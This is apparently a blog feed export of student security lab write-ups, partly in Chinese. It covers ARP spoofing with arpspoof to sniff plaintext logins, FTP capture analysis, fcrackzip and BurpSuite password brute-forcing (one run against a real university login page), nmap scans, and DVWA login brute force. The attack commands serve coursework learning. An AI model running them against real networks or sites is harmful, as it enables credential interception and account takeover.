<p><img src="https://img-blog.csdnimg.cn/20201108160730860.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Sure enough, the ping works.<br>Then capture the packets of B pinging A in Wireshark and filter them with the display filter <code>ip.src == 192.168.238.129</code></p>
<p><img src="https://img-blog.csdnimg.cn/20201108160840731.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Done.</p>
<h4 id="ARP欺骗"><a href="#ARP欺骗" class="headerlink" title="ARP spoofing"></a>ARP spoofing</h4>
<ol><li><p><strong>To capture A's traffic to the external network, B carries out an ARP spoofing attack. Which entity on the subnet does B impersonate?</strong></p>
<blockquote><p>Host B impersonates the subnet's gateway</p></blockquote></li>
<li><p><strong>Write out the arpspoof command format; can B see A's communication with the external network (the account and password A just entered)? Find any website on the Internet that transmits the user's account and password in plaintext, and screenshot the plaintext shown in Wireshark.</strong></p>
<p>In this experiment Kali is host B, which intercepts the data, and the Win7 machine is host A, which sends it. Both hosts are on the same LAN, and host B impersonates the gateway.<br>My Kali was freshly installed and had no arpspoof, so I installed it</p>
<blockquote><p><code>sudo apt-get install dsniff</code></p></blockquote>
<p>Enable IP forwarding so that host B forwards the packets A sends</p>
<blockquote><p><code>echo 1 > /proc/sys/net/ipv4/ip_forward</code></p></blockquote>
<p>Before the attack, look up the other host's IP<br> <img src="https://img-blog.csdnimg.cn/20201110104317987.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"><br>Then look up the LAN gateway<img src="https://img-blog.csdnimg.cn/20201110104343208.jpg#pic_center" alt="Image"><br>Then start the ARP spoofing. The command format is</p>
<blockquote><p><code>arpspoof -i eth0 -t ip_1 ip_2</code></p></blockquote>
<p>ip_1: host A's IP<br>ip_2: the gateway's IP</p>
<p><img src="https://img-blog.csdnimg.cn/20201110104830181.jpg#pic_center" alt="Image"></p>
<p>Then we use host A (Win7) to visit a certain lifestyle website</p>
<p><img src="https://img-blog.csdnimg.cn/20201110104942318.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Look at Wireshark on host B, with the filter <code>http.request.method == POST</code></p>
<p><img src="https://img-blog.csdnimg.cn/20201110105105999.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>The data was captured successfully</p></li></ol>
<h4 id="FTP数据还原部分"><a href="#FTP数据还原部分" class="headerlink" title="FTP data reconstruction"></a>FTP data reconstruction</h4>
<ol><li><p><strong>What is the FTP server's IP address? How did you identify it as an FTP server?</strong></p>
<p>Filtering on ftp shows a large number of packets carried over the FTP protocol, so there is presumably an FTP server.</p>
<p><img src="https://img-blog.csdnimg.cn/20201108161457181.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"><br>The server responds to the user's requests, so filter on 'response'</p>
<p><img src="https://img-blog.csdnimg.cn/20201108161550857.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"><br>The source IP of every response is 192.168.182.1, so the FTP server's IP address is 192.168.182.1</p></li>
<li><p><strong>What are the account and password the client used to log in to the FTP server?</strong></p>
<p>The account and password must have been sent by the user to the FTP server, so filter with <code>ftp && ip.src == 192.168.182.132</code> and search for the 'request' field</p>
<p><img src="https://img-blog.csdnimg.cn/20201108162254246.jpg#pic_center" alt="Image"></p>
<p>This gives account: student, password: sN46i5y.</p></li>
<li><p><strong>The client downloaded or viewed 2 files from the FTP server, one ZIP file and one TXT file. What are their file names?</strong></p>
<p>First, here are the file headers/trailers of several common file formats</p>
<p><img src="https://img-blog.csdnimg.cn/20201108162607333.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>So to find the ZIP file, search directly for the hex bytes '50 4B 03 04', which locates the file '1.zip'</p>
<p><img src="https://img-blog.csdnimg.cn/20201108162706949.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<blockquote><p>Every packet has a fixed length, because network transmission limits the length of the data sent at a time; using Follow Stream on any one of the packets gives the complete data.</p></blockquote>
<p>Then we save the raw data as 1.zip</p>
<p><img src="https://img-blog.csdnimg.cn/20201108164500608.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Opening 1.zip shows an image inside, but it requires a password (the lock icon)</p>
<p><img src="https://img-blog.csdnimg.cn/20201108164603909.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Here I use the brute-force tool fcrackzip, but I ran into some problems installing it, as follows:<br>This is the normal install command <code>sudo apt-get install fcrackzip</code></p>
<p><img src="https://img-blog.csdnimg.cn/20201108165732897.jpg#pic_center" alt="Image"></p>
<p>The error occurred because my package sources had not been updated yet; the update command is <code>sudo apt-get update</code></p>
<p><img src="https://img-blog.csdnimg.cn/20201108170100453.jpg#pic_center" alt="Image"></p>
<p>Then install fcrackzip again</p>
<p><img src="https://img-blog.csdnimg.cn/20201108170139204.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Then run the brute-force crack. Here are some commonly used options, shared for reference</p>
<p><img src="https://img-blog.csdnimg.cn/20201108170351636.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>The cracking command is <code>fcrackzip -v -b -c1 -l 6 -u 1.zip</code></p>
<p><img src="https://img-blog.csdnimg.cn/20201108170504276.jpg#pic_center" alt="Image"></p>
<p>Unlocking it yields a penguin image</p>
<p><img src="https://img-blog.csdnimg.cn/20201108170556507.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>For the TXT file, searching for the 'txt' field gives '复习题.txt'</p>
<p><img src="https://img-blog.csdnimg.cn/20201108170837539.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"><br>Note that you need to find '复习题.txt' in the FTP-DATA stream; only that stream shows the content (the same goes for the ZIP above)</p>
<p><img src="https://img-blog.csdnimg.cn/20201108171746494.jpg#pic_center" alt="Image"></p></li></ol>
<h3 id="网站密码破解部分"><a href="#网站密码破解部分" class="headerlink" title="Website password cracking"></a>Website password cracking</h3>
<ul><li>Dictionary cracking uses the words and phrases people commonly use. If brute force means trying candidates one by one, dictionary cracking exploits people's habit of building passwords from personal names, place names or common words. It is faster than brute force, but a password containing words that are not in the dictionary cannot be cracked, so a good dictionary is the key.<br>With ***** as the target website, build a dictionary (wordlist) that contains your correct password and use BurpSuite to carry out a dictionary attack. How do you determine that a given password is the correct one? Provide a screenshot.</li></ul>
<p>The target this time is a university's student course-selection site, and the tool is BurpSuite</p>
<p><img src="https://img-blog.csdnimg.cn/20201108224311662.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>After confirming the proxy is set up for the site, enter the account and an arbitrary password and click log in; Burp captures the request</p>
<p><img src="https://img-blog.csdnimg.cn/20201108230000304.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Now prepare the brute force</p>
<p>Sniper is fine as the attack type: click Clear, select the password part, then click Add</p>
<p><img src="https://img-blog.csdnimg.cn/20201125211813233.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Because I had temporarily set an arbitrary 6-digit numeric password, I chose Numbers as the payload type, with the range 000000-999999 and a step of 1; set the number format as in the screenshot</p>
<p><img src="https://img-blog.csdnimg.cn/20201108230700944.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>To speed things up, I raised the thread count to 10</p>
<p><img src="https://img-blog.csdnimg.cn/20201109213001113.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Then start the attack</p>
<blockquote><p>When testing with a known password, there is no need to set the range as wide as I did; it takes a lot of time.</p></blockquote>
<p>Result</p>
<p><img src="https://img-blog.csdnimg.cn/20201109213202866.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>The response length for the correct password differs from the others</p>
<p>Then I cracked it once more using a constructed dictionary: leave the payload type at the default Simple list and load the self-built dictionary containing the correct password</p>
<p><img src="https://img-blog.csdnimg.cn/20201110114649518.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p><img src="https://img-blog.csdnimg.cn/20201110114803484.jpg#pic_center" alt="Image"></p>
<p>The result is OK</p>
<h4 id="MD5解密"><a href="#MD5解密" class="headerlink" title="MD5 decryption"></a>MD5 decryption</h4>
<p>SqlMap retrieved a database's user table, in which the MD5 of a user's password is 7282C5050CFE7DF5E09A33CA456B94AE.<br>What, then, is the plaintext password?</p>
<p>I used online lookup sites to crack it and visited four sites in total:</p>
<ul><li><p>Site that succeeded:</p><p> <a href="https://www.somd5.com/">https://www.somd5.com/</a></p></li></ul>
<p><img src="https://img-blog.csdnimg.cn/20201108172822358.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>The plaintext is iampotato</p>
<ul><li><p>Paid sites:</p><p> <a href="https://cmd5.la/user/index.php">https://cmd5.la/user/index.php</a></p><p> <img src="https://img-blog.csdnimg.cn/20201108172901915.jpg#pic_center" alt="Image"></p><p> <a href="https://www.cmd5.com/">https://www.cmd5.com/</a></p></li></ul>
<p><img src="https://img-blog.csdnimg.cn/20201108172918608.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<ul><li><p>Site that failed:</p><p> <a href="https://www.sojson.com/encrypt_md5.html">https://www.sojson.com/encrypt_md5.html</a></p></li></ul>
<p><br> <img src="https://img-blog.csdnimg.cn/20201108172937345.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<h4 id="John-the-Ripper的作用"><a href="#John-the-Ripper的作用" class="headerlink" title="What John the Ripper does"></a>What John the Ripper does</h4>
<p>John the Ripper is free, open-source software: a fast password cracker that tries to recover the plaintext from a known ciphertext. It supports most current encryption algorithms, such as DES, MD4 and MD5, and runs on many different system architectures, including Unix, Linux, Windows, DOS, BeOS and OpenVMS. Its main purpose is to crack weak Unix/Linux system passwords.</p>
<h3 id="问题思考"><a href="#问题思考" class="headerlink" title="Questions for reflection"></a>Questions for reflection</h3>
<h4 id="如何防止ARP攻击"><a href="#如何防止ARP攻击" class="headerlink" title="How to prevent ARP attacks"></a>How to prevent ARP attacks</h4>
<p>The methods for preventing ARP attacks described in many people's blogs are generally these three</p>
<ul><li>Two-way binding</li><li>A personal ARP firewall</li><li>VLANs and switch port binding</li></ul>
<p>However, I also found the most fundamental way to solve ARP attacks: the immunity network</p>
<p>An immunity network adds a security and management solution on top of an ordinary switched network made up of existing routers, switches, network cards and cables. Security and management mechanisms are thereby built into ordinary network communication, giving the network security control during communication and closing the inherent hole of ordinary networks having no security defenses at all.</p>
<p><a href="https://www.jianshu.com/p/c04c76e2fe96">Reference link</a></p>
<h4 id="安全密码-口令-应遵循的原则"><a href="#安全密码-口令-应遵循的原则" class="headerlink" title="Principles a secure password should follow"></a>Principles a secure password should follow</h4>
<ul><li>Avoid weak passwords</li><li>Easy for the user to remember</li><li>Using the same password on different platforms is not recommended<h4 id="字典攻击中字典的重要性"><a href="#字典攻击中字典的重要性" class="headerlink" title="The importance of the dictionary in a dictionary attack"></a>The importance of the dictionary in a dictionary attack</h4>Dictionaries are very effective against weak passwords, patterned passwords and passwords containing particular fields; brute-forcing such passwords is very likely to succeed. In addition, combining a dictionary with social engineering is definitely a case of 1+1>2 and raises the success rate of the brute force.<h3 id="实验小结"><a href="#实验小结" class="headerlink" title="Summary"></a>Summary</h3></li>
<li>Learned ARP spoofing</li><li>Learned about the FTP transfer protocol</li><li>Learned how ARP attacks work</li><li>Learned new Wireshark filter rules</li><li>Learned to brute-force with Burp (partially)</li></ul>
<p>A very rewarding lab, 233.</p>]]></content>
<summary type="html"><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="Experiment objectives"></a>Experiment objectives</h2><ul>
<li>Learn to use a sniffer by working with Wireshark, capture packets of HTTP and other protocols in order to understand</summary>
<category term="Network Penetration" scheme="http://example.com/categories/Network-Penetration/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>Network scanning & Network investigation</title>
<link href="http://example.com/2020/11/07/Network%20scanning%20&%20Network%20investigation/"/>
<id>http://example.com/2020/11/07/Network%20scanning%20&%20Network%20investigation/</id>
<published>2020-11-07T08:42:01.000Z</published>
<updated>2022-03-18T06:03:46.013Z</updated>
<content type="html"><![CDATA[<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ul><li>理解Network scanning&Network investigation的作用;通过搭建Network penetration testing平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。</li></ul><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2><ul><li>Kali Linux 2;Windows<h2 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>网络环境</h2></li><li>交换网络结构<h2 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>实验工具</h2></li><li>Metasploitable2(虚拟机镜像);Nmap(Kali自带);WinHex、数据恢复软件等<h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h2><h3 id="文档查找"><a href="#文档查找" class="headerlink" title="文档查找"></a>文档查找</h3>用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档<br>搜索:”network security” filetype:pdf site:<a href="http://www.mit.edu/">www.mit.edu/</a></li></ul><p><strong>谷歌</strong></p><p><img src="https://img-blog.csdnimg.cn/20201101211755433.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201101211800338.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>百度</strong></p><p><img src="https://img-blog.csdnimg.cn/20201101211757637.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="地址查询"><a href="#地址查询" class="headerlink" title="地址查询"></a>地址查询</h3><p>查询此图的地理位置信息</p><p><img src="https://img-blog.csdnimg.cn/20201101212120763.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>首先在马蜂窝上搜索到Le 
Trentehuit,可以直接得到地址的具体信息(可能因为网速的原因,一直没加载出来),可以看到图片的右边显示的地址具体信息——<br>地址:38 avenue de Suffren,75015 Paris, ,France</p><p><img src="https://img-blog.csdnimg.cn/20201101213418831.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>随后采用百度地图定位到巴黎进行搜索</p><p><img src="https://img-blog.csdnimg.cn/20201101213547531.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>找到之后通过图片确认</p><p><img src="https://img-blog.csdnimg.cn/20201101213625877.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="手机定位"><a href="#手机定位" class="headerlink" title="手机定位"></a>手机定位</h3><p>采用1+品牌的机型进行实验,拨号界面进入手机信息工程模式,一次成功.(HW采用拨号进入的方法没有查到LAC和CID)</p><p><strong>1+手机的信息展示:</strong></p><p><img src="https://img-blog.csdnimg.cn/20201101215204905.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>通过手机获取的LAC和CID查询位置信息</p><p><img src="https://img-blog.csdnimg.cn/20201101215204948.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="编码解码"><a href="#编码解码" class="headerlink" title="编码解码"></a>编码解码</h3><p>通过观察码 Z29vZCBnb29kIHN0dWR5IQ== 的格式发现是Base64格式的码(尾巴的‘==’),所以直接网站解码</p><p><img src="https://img-blog.csdnimg.cn/20201101215347832.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img 
src="https://img-blog.csdnimg.cn/20201101215347838.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="地址信息"><a href="#地址信息" class="headerlink" title="地址信息"></a>地址信息</h3><h4 id="查询MAC-amp-IP地址"><a href="#查询MAC-amp-IP地址" class="headerlink" title="查询MAC&IP地址"></a>查询MAC&IP地址</h4><p>内网中捕获到一个以太帧,源MAC地址为:98-CA-33-02-27-B5;目的IP地址为:202.193.64.34。<br>查询:该用户使用的什么品牌的设备,访问的是什么网站?</p><p><strong>MAC地址查询</strong><br><img src="https://img-blog.csdnimg.cn/20201101220543481.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>IP地址查询</strong><br><img src="https://img-blog.csdnimg.cn/20201101221509972.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="查询MAC-amp-IP地址-1"><a href="#查询MAC-amp-IP地址-1" class="headerlink" title="查询MAC&IP地址"></a>查询MAC&IP地址</h4><p>访问<a href="https://whatismyipaddress.com得到myip信息,利用`ipconfig`(windows)或`ifconfig`(linux)查看本机ip地址./">https://whatismyipaddress.com得到MyIP信息,利用`ipconfig`(Windows)或`ifconfig`(Linux)查看本机IP地址。</a><br>答:两者值相同吗?如果不相同的话,说明原因。</p><p><img src="https://img-blog.csdnimg.cn/20201101223119968.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201101223119725.jpg#pic_center" alt="在这里插入图片描述"></p><p><strong>不相同</strong></p><p>网站查询的是公网ip,ipconfig查询的是内网ip,访问网站的时候网络运营商做了NAT,甚至是动态的NAT,所以公网查询到的ip和内网查询到的是不一样的。</p><h3 id="NAMP使用"><a href="#NAMP使用" class="headerlink" title="NAMP使用"></a>NAMP使用</h3><p>先用<code>ifconfig</code>查一下kali的ip,后面排除用。(其实也没啥用(<em>^__^</em>) 嘻嘻……)</p><p><img 
src="https://img-blog.csdnimg.cn/20201105195304247.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>然后通过ip和子网掩码,再加上nmap命令查看子网内存活的主机,命令<code>nmap -sP</code></p><p><img src="https://img-blog.csdnimg.cn/20201105200727567.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>通过挨个测试来确定哪个是要渗透的ip,可以通过ip加路由的方式看哪个链接能登录网页</p><h4 id="利用NMAP扫描Metasploitable2的端口开放情况并说明其中四个端口的提供的服务,简要说明该服务的功能"><a href="#利用NMAP扫描Metasploitable2的端口开放情况并说明其中四个端口的提供的服务,简要说明该服务的功能" class="headerlink" title="利用NMAP扫描Metasploitable2的端口开放情况并说明其中四个端口的提供的服务,简要说明该服务的功能"></a>利用NMAP扫描Metasploitable2的端口开放情况并说明其中四个端口的提供的服务,简要说明该服务的功能</h4><p>通过命令<code>nmap -u</code>扫描</p><p><img src="https://img-blog.csdnimg.cn/20201105201648463.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>端口nfs服务</strong></p><p>通过网络,让不同的机器、不同的操作系统可以共享彼此的文件。NFS服务器可以让PC将网络中的NFS服务器共享的目录挂载到本地端的文件系统中,而在本地端的系统中来看,那个远程主机的目录就好像是自己的一个磁盘分区一样,在使用上相当便利。</p><p><strong>端口postgresql服务</strong></p><p>postgres 是 PostgreSQL 数据库服务器。 客户端应用程序为了访问数据库,将通过 TCP Socket 或 Unix domain socket 连接到一个运行中的 postgres 进程。 然后该 postgres 实例将启动(fork)一个新的、独立的服务器进程来处理这个连接。</p><p><strong>端口netbios-ssn服务</strong></p><p>139是NETBIOS Session Service端口,用于提供文件共享服务,主要用于企业内部网之间互相<br>访问,如文件共享或打印等等.若你是单机在互联网上,最好还是将139关了,因为你几乎用不<br>到;若你在企业内部网,就大可不必,因为关掉后没多大意思,非等闲之人也进不了你的企业网。</p><p><strong>端口ccproxy-ftp服务</strong></p><p>用于局域网内共享宽带上网,ADSL共享上网、专线代理共享、ISDN代理共享、卫星代理共享、蓝牙代理共享和二级代理等共享代理上网。</p><h4 id="利用NMAP扫描Metasploitable2的操作系统类型"><a href="#利用NMAP扫描Metasploitable2的操作系统类型" class="headerlink" title="利用NMAP扫描Metasploitable2的操作系统类型"></a>利用NMAP扫描Metasploitable2的操作系统类型</h4><p>使用命令<code>nmap 
-O</code>检测Metasploitable2操作系统</p><p><img src="https://img-blog.csdnimg.cn/20201105204248260.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="利用NMAP穷举-Metasploitable2上-dvwa-的登录账号和密码"><a href="#利用NMAP穷举-Metasploitable2上-dvwa-的登录账号和密码" class="headerlink" title="利用NMAP穷举 Metasploitable2上 dvwa 的登录账号和密码"></a>利用NMAP穷举 Metasploitable2上 dvwa 的登录账号和密码</h4><p>Nmap 自带有一些脚本,可以用来探测登陆界面或blast登陆界面,首先判断 dvwa 在 80 端口上,用<code>http-auth-finder</code>脚本探测站点上的登录授权页面,发现<code>/dvwa/login.php</code></p><p><img src="https://img-blog.csdnimg.cn/20201105204611508.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>尝试使用类似于<code>http-form-brute</code>的脚本blast出一些账户密码,<code>http-form-brute</code> 传参<code>--script-args=http-form-brute.path=/dvwa/login.php 192.168.10.227</code>进行blast,得到账号:<strong>admin</strong>密码:<strong>password</strong></p><h4 id="查阅资料,永恒之蓝-WannaCry蠕虫利用漏洞的相关信息。"><a href="#查阅资料,永恒之蓝-WannaCry蠕虫利用漏洞的相关信息。" class="headerlink" title="查阅资料,永恒之蓝-WannaCry蠕虫利用漏洞的相关信息。"></a>查阅资料,永恒之蓝-WannaCry蠕虫利用漏洞的相关信息。</h4><p>永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码。</p><p>例如:WannaCry事件中,不法分子用永恒之蓝攻陷一台机器后会向该机器继续下发并运行永恒之蓝利用工具,让被攻陷的机器继续去扫描其他开放445端口的机器的同时下发并运行勒索病毒,加密用户系统中的文件,达到蠕虫式的传播,从而对全球上百个国家造成巨大影响。</p><h3 